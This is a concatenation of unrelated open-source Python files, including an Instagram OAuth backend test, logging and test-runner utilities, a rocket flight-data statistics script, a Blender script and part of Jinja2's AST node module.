#ax.text(x1,y1,"y-axis, $<\sigma>$ = "+str(round(mean(params_labels[num+3][pick]),2)),fontsize = 14)
ax1.plot([0,6000], [0,6000], linewidth = 1.5, color = 'k' )
ax2.plot([0,5], [0,5], linewidth = 1.5, color = 'k' )
ax3.plot([-3,2], [-3,2], linewidth = 1.5, color = 'k' )
ax4.plot([-5,25], [-5,25], linewidth = 1.5, color = 'k' )
ax1.set_xlim(3500, 5500)
ax1.set_ylim(3500, 5500)
ax2.set_xlim(0, 5)
ax2.set_ylim(0, 5)
ax3.set_xlim(-3, 2)
ax4.set_xlim(-3, 20)
ax4.set_ylim(-3, 20)
ax1.set_xlabel("ASPCAP Teff (IR flux method) , [K]", fontsize = 14,labelpad = 5)
ax1.set_ylabel("Teff, [K]", fontsize = 14,labelpad = 10)
ax2.set_xlabel("ASPCAP logg (Kepler correction) , [dex]", fontsize = 14,labelpad = 5)
ax2.set_ylabel("logg, [dex]", fontsize = 14,labelpad = 10)
ax3.set_xlabel("ASPCAP [Fe/H], [dex]", fontsize = 14,labelpad = 5)
ax3.set_ylabel(" [Fe/H], [dex]", fontsize = 14,labelpad = 10)
ax4.set_ylabel("Age [Gyr]", fontsize = 14,labelpad = 5)
ax4.set_xlabel("Literature Ages [Gyr]", fontsize = 14,labelpad = 10)
# attach lines to plots
fig.subplots_adjust(hspace=0.44)
return
def savefig(fig, prefix, **kwargs):
for suffix in (".eps", ".png"):
print "writing %s" % (prefix + suffix)
fig.savefig(prefix + suffix, **kwargs)
if __name__ == "__main__": #args in command line
wl1,wl2,wl3,wl4,wl5,wl6 = 15392, 15697, 15958.8, 16208.6, 16120.4, 16169.5
plotfits()
| mit |
joelstanner/python-social-auth | social/tests/backends/test_instagram.py | 92 | 1787 | import json
from social.tests.backends.oauth import OAuth2Test
class InstagramOAuth2Test(OAuth2Test):
backend_path = 'social.backends.instagram.InstagramOAuth2'
user_data_url = 'https://api.instagram.com/v1/users/self'
expected_username = 'foobar'
access_token_body = json.dumps({
'access_token': 'foobar',
'token_type': 'bearer',
'meta': {
'code': 200
},
'data': {
'username': 'foobar',
'bio': '',
'website': '',
'profile_picture': 'http://images.instagram.com/profiles/'
'anonymousUser.jpg',
'full_name': '',
'counts': {
'media': 0,
'followed_by': 2,
'follows': 0
},
'id': '101010101'
},
'user': {
'username': 'foobar',
'bio': '',
'website': '',
'profile_picture': 'http://images.instagram.com/profiles/'
'anonymousUser.jpg',
'full_name': '',
'id': '101010101'
}
})
user_data_body = json.dumps({
'meta': {
'code': 200
},
'data': {
'username': 'foobar',
'bio': '',
'website': '',
'profile_picture': 'http://images.instagram.com/profiles/'
'anonymousUser.jpg',
'full_name': '',
'counts': {
'media': 0,
'followed_by': 2,
'follows': 0
},
'id': '101010101'
}
})
def test_login(self):
self.do_login()
def test_partial_pipeline(self):
self.do_partial_pipeline()
| bsd-3-clause |
JianfengXu/crosswalk-test-suite | cordova/cordova-feature-android-tests/feature/mobilespec_close.py | 18 | 2240 | #!/usr/bin/env python
#
# Copyright (c) 2015 Intel Corporation.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of works must retain the original copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the original copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of Intel Corporation nor the names of its contributors
# may be used to endorse or promote products derived from this work without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY INTEL CORPORATION "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL INTEL CORPORATION BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors:
# Lin, Wanming <wanming.lin@intel.com>
import unittest
import os
import commands
import comm
import time
class TestMobileSpecAppClose(unittest.TestCase):
def test_close(self):
comm.setUp()
app_name = "mobilespec"
pkg_name = "org.apache." + app_name.lower()
if not comm.check_app_installed(pkg_name, self):
comm.app_install(app_name, pkg_name, self)
if not comm.check_app_launched(pkg_name, self):
print "Close app ---------------->%s App haven't launched, need to launch it!" % app_name
comm.app_launch(app_name, pkg_name, self)
time.sleep(1)
comm.app_stop(pkg_name, self)
if __name__ == '__main__':
unittest.main()
| bsd-3-clause |
Sberned/djaio | djaio/core/logs.py | 1 | 2474 | # -*- coding: utf-8 -*-
import sys
import logging.config
from djaio.core.utils import deep_merge
class ColoredFormatter(logging.Formatter):
RESET = '\x1B[0m'
RED = '\x1B[31m'
YELLOW = '\x1B[33m'
BRGREEN = '\x1B[01;32m' # grey in solarized for terminals
def format(self, record, color=False):
message = super().format(record)
if not color:
return message
level_no = record.levelno
if level_no >= logging.CRITICAL:
color = self.RED
elif level_no >= logging.ERROR:
color = self.RED
elif level_no >= logging.WARNING:
color = self.YELLOW
elif level_no >= logging.INFO:
color = self.RESET
elif level_no >= logging.DEBUG:
color = self.BRGREEN
else:
color = self.RESET
message = color + message + self.RESET
return message
class ColoredHandler(logging.StreamHandler):
def __init__(self, stream=sys.stdout):
super().__init__(stream)
def format(self, record, colour=False):
if not isinstance(self.formatter, ColoredFormatter):
self.formatter = ColoredFormatter('[%(asctime)s] [%(levelname)s][MODULE:"%(module)s"] - "%(message)s"')
return self.formatter.format(record, colour)
def emit(self, record):
stream = self.stream
try:
msg = self.format(record, stream.isatty())
stream.write(msg)
stream.write(self.terminator)
self.flush()
except Exception:
self.handleError(record)
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format': '[%(asctime)s] [%(levelname)s][MODULE:"%(module)s"] - "%(message)s"'
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'handlers': {
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'verbose'
},
},
'loggers': {
'djaio_logger': {
'handlers': ['console'],
'level': 'DEBUG',
},
},
}
def setup(app):
logger_config = getattr(app.settings, 'LOGGING', {})
_LOGGING = deep_merge(LOGGING, logger_config)
if app.settings.DEBUG:
_LOGGING['handlers']['console']['class'] = 'djaio.core.logs.ColoredHandler'
logging.config.dictConfig(_LOGGING)
| apache-2.0 |
lihui7115/ChromiumGStreamerBackend | chrome/test/data/extensions/api_test/activity_log_private/PRESUBMIT.py | 40 | 1836 | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Run the Chrome WebUI presubmit scripts on our test javascript.
See http://dev.chromium.org/developers/how-tos/depottools/presubmit-scripts
for more details about the presubmit API built into depot_tools, and see
http://www.chromium.org/developers/web-development-style-guide for the rules
we're checking against here.
"""
import os
def GetPathsToPrepend(input_api):
web_dev_style_path = input_api.os_path.join(
input_api.change.RepositoryRoot(),
'chrome',
'browser',
'resources')
return [input_api.PresubmitLocalPath(), web_dev_style_path]
def RunWithPrependedPath(prepended_path, fn, *args):
import sys
old_path = sys.path
try:
sys.path = prepended_path + old_path
return fn(*args)
finally:
sys.path = old_path
def CheckChangeOnUpload(input_api, output_api):
def go():
results = []
results.extend(_CommonChecks(input_api, output_api))
return results
return RunWithPrependedPath(GetPathsToPrepend(input_api), go)
def CheckChangeOnCommit(input_api, output_api):
def go():
results = []
results.extend(_CommonChecks(input_api, output_api))
return results
return RunWithPrependedPath(GetPathsToPrepend(input_api), go)
def _CommonChecks(input_api, output_api):
resources = input_api.PresubmitLocalPath()
def _html_css_js_resource(p):
return p.endswith(('.js')) and p.startswith(resources)
def is_resource(maybe_resource):
return _html_css_js_resource(maybe_resource.AbsoluteLocalPath())
from web_dev_style import js_checker
results = []
results.extend(js_checker.JSChecker(
input_api, output_api, file_filter=is_resource).RunChecks())
return results
| bsd-3-clause |
gmartinvela/OpenRocket | generate_statistics_from_SD.py | 1 | 7682 | import fileinput
import math
import collections
import time
import numpy as np
from pylab import *
from matplotlib import pyplot as plt
import matplotlib.mlab as mlab
#file_path = '/media/ABB4-4F3A/DATALOG.TXT'
file_path = 'DATALOG.TXT'
def split_in_blocks(txt_file, pattern):
'''
Find the last appears of the text that indicate a new flight and divide in the number of blocks generated by the rocket
Return: A list that contains all the different blocks of data and a list containing the header.
'''
num_times_find_pattern = []
for num_line, line in enumerate(fileinput.input(txt_file)):
if pattern in line:
num_times_find_pattern.append(num_line)
if num_line == 0:
header = list(line.strip().split(","))
#print header
blocks_of_data = []
with open(txt_file) as f:
lines = f.readlines()
for num_header_line in num_times_find_pattern:
if num_header_line == 0:
num_header_line_prev = num_header_line
else:
block_lines = lines[num_header_line_prev + 1 : num_header_line - 1]
blocks_of_data.append(block_lines)
num_header_line_prev = num_header_line
block_lines = lines[num_header_line_prev + 1 : num_line + 1]
blocks_of_data.append(block_lines)
return blocks_of_data, header
def manage_data_from_blocks(blocks, header):
'''
Divide al the text in blocks tagged with their type of data (accelaration, temperature, ...) continued by a number of block
Return: A dict that contains all the different types of data diferentiated and numbered.
'''
# TODO: Automatize this function to accept more headers!!
blocks_dict = collections.OrderedDict()
for block_number, block in enumerate(blocks):
for item in header:
blocks_dict['%s%s' % (item,block_number)] = []
for line in block:
line_list = line.strip().split(",")
blocks_dict['f%s' % block_number].append(int(line_list[0]))
blocks_dict['ax%s' % block_number].append(float(line_list[1]))
blocks_dict['ay%s' % block_number].append(float(line_list[2]))
blocks_dict['az%s' % block_number].append(float(line_list[3]))
blocks_dict['gx%s' % block_number].append(float(line_list[4]))
blocks_dict['gy%s' % block_number].append(float(line_list[5]))
blocks_dict['gz%s' % block_number].append(float(line_list[6]))
blocks_dict['mx%s' % block_number].append(float(line_list[7]))
blocks_dict['my%s' % block_number].append(float(line_list[8]))
blocks_dict['mz%s' % block_number].append(float(line_list[9]))
blocks_dict['t%s' % block_number].append(float(line_list[10]))
blocks_dict['p%s' % block_number].append(int(line_list[11]))
blocks_dict['h%s' % block_number].append(float(line_list[12]))
return blocks_dict
def process_data(blocks_dict, header):
block_list_header_based = []
for num, item in enumerate(header):
block_list_header_based.append([])
for block in blocks_dict:
if block.startswith(header[num]):
block_list_header_based[num].append(block)
# DEBUG! print "%s: %s" % (block, blocks_dict[block])
print block_list_header_based
#fingerprint_basic_info = basic_process_only_for_fingerprints(block_list_header_based[0])
temp_basic_info = basic_process_data(block_list_header_based[12])
#height_basic_info = basic_process_data(block_list_header_based[12])
print_basic_histograms(block_list_header_based[12])
print_basic_scatters(block_list_header_based[12])
print_basic_evolution_2_axis(block_list_header_based[0], block_list_header_based[12])
def basic_process_only_for_fingerprints(fingerprints):
fingerprint_basic_info = collections.OrderedDict()
fingerprint_list = []
for num, fingerprint_block in enumerate(fingerprints):
millis_interval_list = []
for position, millis in enumerate(blocks_dict[fingerprint_block]):
if position != 0:
millis_interval = millis - millis_prev
millis_interval_list.append(millis_interval)
millis_prev = millis
blocks_dict["fp%s" % (num)] = millis_interval_list
fingerprint_list.append("fp%s" % (num))
fingerprint_basic_info = basic_process_data(fingerprint_list)
return fingerprint_basic_info
def basic_process_data(data_list):
data_basic_info = collections.OrderedDict()
for data_block in data_list:
data_basic_info[data_block] = {}
data_avg_mean = np.mean(blocks_dict[data_block]) # Average
data_avg_weighted = np.average(blocks_dict[data_block]) # Average weighted
data_amax = np.amax(blocks_dict[data_block]) # MAX
data_amin = np.amin(blocks_dict[data_block]) # MIN
data_med = np.median(blocks_dict[data_block]) # Median
data_std = np.std(blocks_dict[data_block]) # Standard deviation
data_ptp = np.ptp(blocks_dict[data_block]) # Distance MAX to MIN
data_var = np.var(blocks_dict[data_block]) # Variance
data_basic_info[data_block] = {"AVM" : "%.3f" % data_avg_mean, "AVW" : "%.3f" % data_avg_weighted, "MAX" : "%.3f" % data_amax,
"MIN" : "%.3f" % data_amin, "MED" : "%.3f" % data_med, "STD" : "%.3f" % data_std,
"PTP" : "%.3f" % data_ptp, "VAR" : "%.3f" % data_var}
# PLOT NORMAL PDF FROM THA DATA
#sigma = sqrt(data_var)
#x = np.linspace(data_amin,data_amax)
#plt.plot(x,mlab.normpdf(x,data_avg_mean,sigma))
plt.show()
for key in data_basic_info:
print data_basic_info[key]
return data_basic_info
def print_basic_histograms(data_list):
#plt.ion()
plt.figure(1)
for num, data in enumerate(data_list):
nrows = int(math.ceil(float(len(data_list) / 3.0)))
ncols = 3
subplot_index = "%s%s%s" % (nrows, ncols, num + 1)
plt.subplot(subplot_index)
plt.hist(blocks_dict[data], bins=20)
#data_new = np.histogramdd(blocks_dict[data])
#plt.hist(data_new, bins=20)
plt.xlabel("Value", fontsize=8)
plt.ylabel("Frequency", fontsize=8)
plt.suptitle("Gaussian Histogram", fontsize=12)
plt.show()
#plt.show(block=True)
def print_basic_scatters(data_list):
#plt.ion()
plt.figure(1)
for num, data in enumerate(data_list):
nrows = int(math.ceil(float(len(data_list) / 3.0)))
ncols = 3
subplot_index = "%s%s%s" % (nrows, ncols, num + 1)
plt.subplot(subplot_index)
plt.scatter(np.random.randn(1000), np.random.randn(1000))
plt.suptitle("Gaussian Histogram", fontsize=12)
plt.show()
#plt.show(block=True)
def print_basic_evolution_2_axis(x_axis_data_list, y_axis_data_list):
plt.figure(1)
for num in range(len(x_axis_data_list)):
x = blocks_dict[x_axis_data_list[num]]
y = blocks_dict[y_axis_data_list[num]]
#subplot(nrows, ncols, plot_number)
nrows = int(math.ceil(float(len(x_axis_data_list) / 3.0)))
ncols = 3
subplot_index = "%s%s%s" % (nrows, ncols, num + 1)
plt.subplot(subplot_index)
plt.plot(x, y, linewidth=1.0, color="green")
xlabel('time (milliseconds)', fontsize = 8)
#ylabel('temperature (C)', fontsize = 8)
#title('', fontsize=10)
grid(True)
plt.xticks(blocks_dict[x_axis_data_list[num]][::len(blocks_dict[x_axis_data_list[num]])/10], rotation=30, fontsize=8)
#plt.annotate('Despegue', xy=(2200, 34.82), xytext=(2300, 34.88),
# bbox=dict(boxstyle="round", fc="0.8"),
# arrowprops=dict(facecolor='black', shrink=0.05),
# )
#plt.annotate('Paracaidas', xy=(7200, 34.82), xytext=(6300, 34.88),
# arrowprops=dict(facecolor='black', shrink=0.05),
# )
#axvline(x=2200)
#axhspan(34.80, 34.82, facecolor='0.5', alpha=0.5, color="red")
plt.ylim(min(blocks_dict[y_axis_data_list[num]]) - 0.02, max(blocks_dict[y_axis_data_list[num]]) + 0.02)
plt.yticks(fontsize=8)
#plt.suptitle('temperatures in data', fontsize=12)
plt.show()
#start = time.time()
blocks, header = split_in_blocks(file_path, "m")
blocks_dict = manage_data_from_blocks(blocks, header)
process_data(blocks_dict, header)
#stop = time.time()
#total_time = stop -start
#print total_time | mit |
AOSPU/external_chromium_org | chrome/test/chromedriver/test/unittest_util.py | 134 | 4320 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Utilities for dealing with the python unittest module."""
import fnmatch
import sys
import unittest
class _TextTestResult(unittest._TextTestResult):
"""A test result class that can print formatted text results to a stream.
Results printed in conformance with gtest output format, like:
[ RUN ] autofill.AutofillTest.testAutofillInvalid: "test desc."
[ OK ] autofill.AutofillTest.testAutofillInvalid
[ RUN ] autofill.AutofillTest.testFillProfile: "test desc."
[ OK ] autofill.AutofillTest.testFillProfile
[ RUN ] autofill.AutofillTest.testFillProfileCrazyCharacters: "Test."
[ OK ] autofill.AutofillTest.testFillProfileCrazyCharacters
"""
def __init__(self, stream, descriptions, verbosity):
unittest._TextTestResult.__init__(self, stream, descriptions, verbosity)
self._fails = set()
def _GetTestURI(self, test):
return '%s.%s.%s' % (test.__class__.__module__,
test.__class__.__name__,
test._testMethodName)
def getDescription(self, test):
return '%s: "%s"' % (self._GetTestURI(test), test.shortDescription())
def startTest(self, test):
unittest.TestResult.startTest(self, test)
self.stream.writeln('[ RUN ] %s' % self.getDescription(test))
def addSuccess(self, test):
unittest.TestResult.addSuccess(self, test)
self.stream.writeln('[ OK ] %s' % self._GetTestURI(test))
def addError(self, test, err):
unittest.TestResult.addError(self, test, err)
self.stream.writeln('[ ERROR ] %s' % self._GetTestURI(test))
self._fails.add(self._GetTestURI(test))
def addFailure(self, test, err):
unittest.TestResult.addFailure(self, test, err)
self.stream.writeln('[ FAILED ] %s' % self._GetTestURI(test))
self._fails.add(self._GetTestURI(test))
def getRetestFilter(self):
return ':'.join(self._fails)
class TextTestRunner(unittest.TextTestRunner):
"""Test Runner for displaying test results in textual format.
Results are displayed in conformance with google test output.
"""
def __init__(self, verbosity=1):
unittest.TextTestRunner.__init__(self, stream=sys.stderr,
verbosity=verbosity)
def _makeResult(self):
return _TextTestResult(self.stream, self.descriptions, self.verbosity)
def GetTestsFromSuite(suite):
"""Returns all the tests from a given test suite."""
tests = []
for x in suite:
if isinstance(x, unittest.TestSuite):
tests += GetTestsFromSuite(x)
else:
tests += [x]
return tests
def GetTestNamesFromSuite(suite):
"""Returns a list of every test name in the given suite."""
return map(lambda x: GetTestName(x), GetTestsFromSuite(suite))
def GetTestName(test):
"""Gets the test name of the given unittest test."""
return '.'.join([test.__class__.__module__,
test.__class__.__name__,
test._testMethodName])
def FilterTestSuite(suite, gtest_filter):
"""Returns a new filtered tests suite based on the given gtest filter.
See http://code.google.com/p/googletest/wiki/AdvancedGuide
for gtest_filter specification.
"""
return unittest.TestSuite(FilterTests(GetTestsFromSuite(suite), gtest_filter))
def FilterTests(all_tests, gtest_filter):
"""Returns a filtered list of tests based on the given gtest filter.
See http://code.google.com/p/googletest/wiki/AdvancedGuide
for gtest_filter specification.
"""
pattern_groups = gtest_filter.split('-')
positive_patterns = pattern_groups[0].split(':')
negative_patterns = None
if len(pattern_groups) > 1:
negative_patterns = pattern_groups[1].split(':')
tests = []
for test in all_tests:
test_name = GetTestName(test)
# Test name must by matched by one positive pattern.
for pattern in positive_patterns:
if fnmatch.fnmatch(test_name, pattern):
break
else:
continue
# Test name must not be matched by any negative patterns.
for pattern in negative_patterns or []:
if fnmatch.fnmatch(test_name, pattern):
break
else:
tests += [test]
return tests
| bsd-3-clause |
oscurart/BlenderAddons | oscurart_freeze_scale_linked_data.py | 1 | 1304 | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# AUTHOR: Eugenio Pignataro (Oscurart) www.oscurart.com.ar
# USAGE: Select object and run. This script freeze scale in linked mesh data.
import bpy
for ob in bpy.context.selected_objects:
odata = bpy.context.object.data
for vert in ob.data.vertices:
vert.co[0] *= ob.scale[0]
vert.co[1] *= ob.scale[1]
vert.co[2] *= ob.scale[2]
ob.scale = (1,1,1)
for lob in bpy.data.objects:
if lob.data == odata:
lob.scale = (1,1,1) | gpl-2.0 |
codeworldprodigy/lab4 | lib/jinja2/nodes.py | 623 | 28875 | # -*- coding: utf-8 -*-
"""
jinja2.nodes
~~~~~~~~~~~~
This module implements additional nodes derived from the ast base node.
It also provides some node tree helper functions like `in_lineno` and
`get_nodes` used by the parser and translator in order to normalize
python and jinja nodes.
:copyright: (c) 2010 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
import operator
from collections import deque
from jinja2.utils import Markup
from jinja2._compat import next, izip, with_metaclass, text_type, \
method_type, function_type
#: the types we support for context functions
_context_function_types = (function_type, method_type)
_binop_to_func = {
'*': operator.mul,
'/': operator.truediv,
'//': operator.floordiv,
'**': operator.pow,
'%': operator.mod,
'+': operator.add,
'-': operator.sub
}
_uaop_to_func = {
'not': operator.not_,
'+': operator.pos,
'-': operator.neg
}
_cmpop_to_func = {
'eq': operator.eq,
'ne': operator.ne,
'gt': operator.gt,
'gteq': operator.ge,
'lt': operator.lt,
'lteq': operator.le,
'in': lambda a, b: a in b,
'notin': lambda a, b: a not in b
}
class Impossible(Exception):
"""Raised if the node could not perform a requested action."""
class NodeType(type):
"""A metaclass for nodes that handles the field and attribute
inheritance. fields and attributes from the parent class are
automatically forwarded to the child."""
def __new__(cls, name, bases, d):
for attr in 'fields', 'attributes':
storage = []
storage.extend(getattr(bases[0], attr, ()))
storage.extend(d.get(attr, ()))
assert len(bases) == 1, 'multiple inheritance not allowed'
assert len(storage) == len(set(storage)), 'layout conflict'
d[attr] = tuple(storage)
d.setdefault('abstract', False)
return type.__new__(cls, name, bases, d)
class EvalContext(object):
"""Holds evaluation time information. Custom attributes can be attached
to it in extensions.
"""
def __init__(self, environment, template_name=None):
self.environment = environment
if callable(environment.autoescape):
self.autoescape = environment.autoescape(template_name)
else:
self.autoescape = environment.autoescape
self.volatile = False
def save(self):
return self.__dict__.copy()
def revert(self, old):
self.__dict__.clear()
self.__dict__.update(old)
def get_eval_context(node, ctx):
if ctx is None:
if node.environment is None:
raise RuntimeError('if no eval context is passed, the '
'node must have an attached '
'environment.')
return EvalContext(node.environment)
return ctx
class Node(with_metaclass(NodeType, object)):
"""Baseclass for all Jinja2 nodes. There are a number of nodes available
of different types. There are four major types:
- :class:`Stmt`: statements
- :class:`Expr`: expressions
- :class:`Helper`: helper nodes
- :class:`Template`: the outermost wrapper node
All nodes have fields and attributes. Fields may be other nodes, lists,
or arbitrary values. Fields are passed to the constructor as regular
positional arguments, attributes as keyword arguments. Each node has
two attributes: `lineno` (the line number of the node) and `environment`.
The `environment` attribute is set at the end of the parsing process for
all nodes automatically.
"""
fields = ()
attributes = ('lineno', 'environment')
abstract = True
def __init__(self, *fields, **attributes):
if self.abstract:
raise TypeError('abstract nodes are not instanciable')
if fields:
if len(fields) != len(self.fields):
if not self.fields:
raise TypeError('%r takes 0 arguments' %
self.__class__.__name__)
raise TypeError('%r takes 0 or %d argument%s' % (
self.__class__.__name__,
len(self.fields),
len(self.fields) != 1 and 's' or ''
))
for name, arg in izip(self.fields, fields):
setattr(self, name, arg)
for attr in self.attributes:
setattr(self, attr, attributes.pop(attr, None))
if attributes:
raise TypeError('unknown attribute %r' %
next(iter(attributes)))
def iter_fields(self, exclude=None, only=None):
"""This method iterates over all fields that are defined and yields
``(key, value)`` tuples. Per default all fields are returned, but
it's possible to limit that to some fields by providing the `only`
parameter or to exclude some using the `exclude` parameter. Both
should be sets or tuples of field names.
"""
for name in self.fields:
if (exclude is only is None) or \
(exclude is not None and name not in exclude) or \
(only is not None and name in only):
try:
yield name, getattr(self, name)
except AttributeError:
pass
def iter_child_nodes(self, exclude=None, only=None):
"""Iterates over all direct child nodes of the node. This iterates
over all fields and yields the values of they are nodes. If the value
of a field is a list all the nodes in that list are returned.
"""
for field, item in self.iter_fields(exclude, only):
if isinstance(item, list):
for n in item:
if isinstance(n, Node):
yield n
elif isinstance(item, Node):
yield item
def find(self, node_type):
"""Find the first node of a given type. If no such node exists the
return value is `None`.
"""
for result in self.find_all(node_type):
return result
def find_all(self, node_type):
"""Find all the nodes of a given type. If the type is a tuple,
the check is performed for any of the tuple items.
"""
for child in self.iter_child_nodes():
if isinstance(child, node_type):
yield child
for result in child.find_all(node_type):
yield result
def set_ctx(self, ctx):
"""Reset the context of a node and all child nodes. Per default the
parser will all generate nodes that have a 'load' context as it's the
most common one. This method is used in the parser to set assignment
targets and other nodes to a store context.
"""
todo = deque([self])
while todo:
node = todo.popleft()
if 'ctx' in node.fields:
node.ctx = ctx
todo.extend(node.iter_child_nodes())
return self
def set_lineno(self, lineno, override=False):
"""Set the line numbers of the node and children."""
todo = deque([self])
while todo:
node = todo.popleft()
if 'lineno' in node.attributes:
if node.lineno is None or override:
node.lineno = lineno
todo.extend(node.iter_child_nodes())
return self
def set_environment(self, environment):
"""Set the environment for all nodes."""
todo = deque([self])
while todo:
node = todo.popleft()
node.environment = environment
todo.extend(node.iter_child_nodes())
return self
def __eq__(self, other):
return type(self) is type(other) and \
tuple(self.iter_fields()) == tuple(other.iter_fields())
def __ne__(self, other):
return not self.__eq__(other)
# Restore Python 2 hashing behavior on Python 3
__hash__ = object.__hash__
def __repr__(self):
return '%s(%s)' % (
self.__class__.__name__,
', '.join('%s=%r' % (arg, getattr(self, arg, None)) for
arg in self.fields)
)
class Stmt(Node):
"""Base node for all statements."""
abstract = True
class Helper(Node):
"""Nodes that exist in a specific context only."""
abstract = True
class Template(Node):
"""Node that represents a template. This must be the outermost node that
is passed to the compiler.
"""
fields = ('body',)
class Output(Stmt):
"""A node that holds multiple expressions which are then printed out.
This is used both for the `print` statement and the regular template data.
"""
fields = ('nodes',)
class Extends(Stmt):
"""Represents an extends statement."""
fields = ('template',)
class For(Stmt):
"""The for loop. `target` is the target for the iteration (usually a
:class:`Name` or :class:`Tuple`), `iter` the iterable. `body` is a list
of nodes that are used as loop-body, and `else_` a list of nodes for the
`else` block. If no else node exists it has to be an empty list.
For filtered nodes an expression can be stored as `test`, otherwise `None`.
"""
fields = ('target', 'iter', 'body', 'else_', 'test', 'recursive')
class If(Stmt):
"""If `test` is true, `body` is rendered, else `else_`."""
fields = ('test', 'body', 'else_')
class Macro(Stmt):
"""A macro definition. `name` is the name of the macro, `args` a list of
arguments and `defaults` a list of defaults if there are any. `body` is
a list of nodes for the macro body.
"""
fields = ('name', 'args', 'defaults', 'body')
class CallBlock(Stmt):
"""Like a macro without a name but a call instead. `call` is called with
the unnamed macro as `caller` argument this node holds.
"""
fields = ('call', 'args', 'defaults', 'body')
class FilterBlock(Stmt):
"""Node for filter sections."""
fields = ('body', 'filter')
class Block(Stmt):
"""A node that represents a block."""
fields = ('name', 'body', 'scoped')
class Include(Stmt):
"""A node that represents the include tag."""
fields = ('template', 'with_context', 'ignore_missing')
class Import(Stmt):
"""A node that represents the import tag."""
fields = ('template', 'target', 'with_context')
class FromImport(Stmt):
"""A node that represents the from import tag. It's important to not
pass unsafe names to the name attribute. The compiler translates the
attribute lookups directly into getattr calls and does *not* use the
subscript callback of the interface. As exported variables may not
start with double underscores (which the parser asserts) this is not a
problem for regular Jinja code, but if this node is used in an extension
extra care must be taken.
The list of names may contain tuples if aliases are wanted.
"""
fields = ('template', 'names', 'with_context')
class ExprStmt(Stmt):
"""A statement that evaluates an expression and discards the result."""
fields = ('node',)
class Assign(Stmt):
"""Assigns an expression to a target."""
fields = ('target', 'node')
class Expr(Node):
"""Baseclass for all expressions."""
abstract = True
def as_const(self, eval_ctx=None):
"""Return the value of the expression as constant or raise
:exc:`Impossible` if this was not possible.
An :class:`EvalContext` can be provided, if none is given
a default context is created which requires the nodes to have
an attached environment.
.. versionchanged:: 2.4
the `eval_ctx` parameter was added.
"""
raise Impossible()
def can_assign(self):
"""Check if it's possible to assign something to this node."""
return False
class BinExpr(Expr):
"""Baseclass for all binary expressions."""
fields = ('left', 'right')
operator = None
abstract = True
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
# intercepted operators cannot be folded at compile time
if self.environment.sandboxed and \
self.operator in self.environment.intercepted_binops:
raise Impossible()
f = _binop_to_func[self.operator]
try:
return f(self.left.as_const(eval_ctx), self.right.as_const(eval_ctx))
except Exception:
raise Impossible()
class UnaryExpr(Expr):
"""Baseclass for all unary expressions."""
fields = ('node',)
operator = None
abstract = True
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
# intercepted operators cannot be folded at compile time
if self.environment.sandboxed and \
self.operator in self.environment.intercepted_unops:
raise Impossible()
f = _uaop_to_func[self.operator]
try:
return f(self.node.as_const(eval_ctx))
except Exception:
raise Impossible()
class Name(Expr):
"""Looks up a name or stores a value in a name.
The `ctx` of the node can be one of the following values:
- `store`: store a value in the name
- `load`: load that name
- `param`: like `store` but if the name was defined as function parameter.
"""
fields = ('name', 'ctx')
def can_assign(self):
return self.name not in ('true', 'false', 'none',
'True', 'False', 'None')
class Literal(Expr):
"""Baseclass for literals."""
abstract = True
class Const(Literal):
"""All constant values. The parser will return this node for simple
constants such as ``42`` or ``"foo"`` but it can be used to store more
complex values such as lists too. Only constants with a safe
representation (objects where ``eval(repr(x)) == x`` is true).
"""
fields = ('value',)
def as_const(self, eval_ctx=None):
return self.value
@classmethod
def from_untrusted(cls, value, lineno=None, environment=None):
"""Return a const object if the value is representable as
constant value in the generated code, otherwise it will raise
an `Impossible` exception.
"""
from .compiler import has_safe_repr
if not has_safe_repr(value):
raise Impossible()
return cls(value, lineno=lineno, environment=environment)
class TemplateData(Literal):
"""A constant template string."""
fields = ('data',)
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
if eval_ctx.volatile:
raise Impossible()
if eval_ctx.autoescape:
return Markup(self.data)
return self.data
class Tuple(Literal):
"""For loop unpacking and some other things like multiple arguments
for subscripts. Like for :class:`Name` `ctx` specifies if the tuple
is used for loading the names or storing.
"""
fields = ('items', 'ctx')
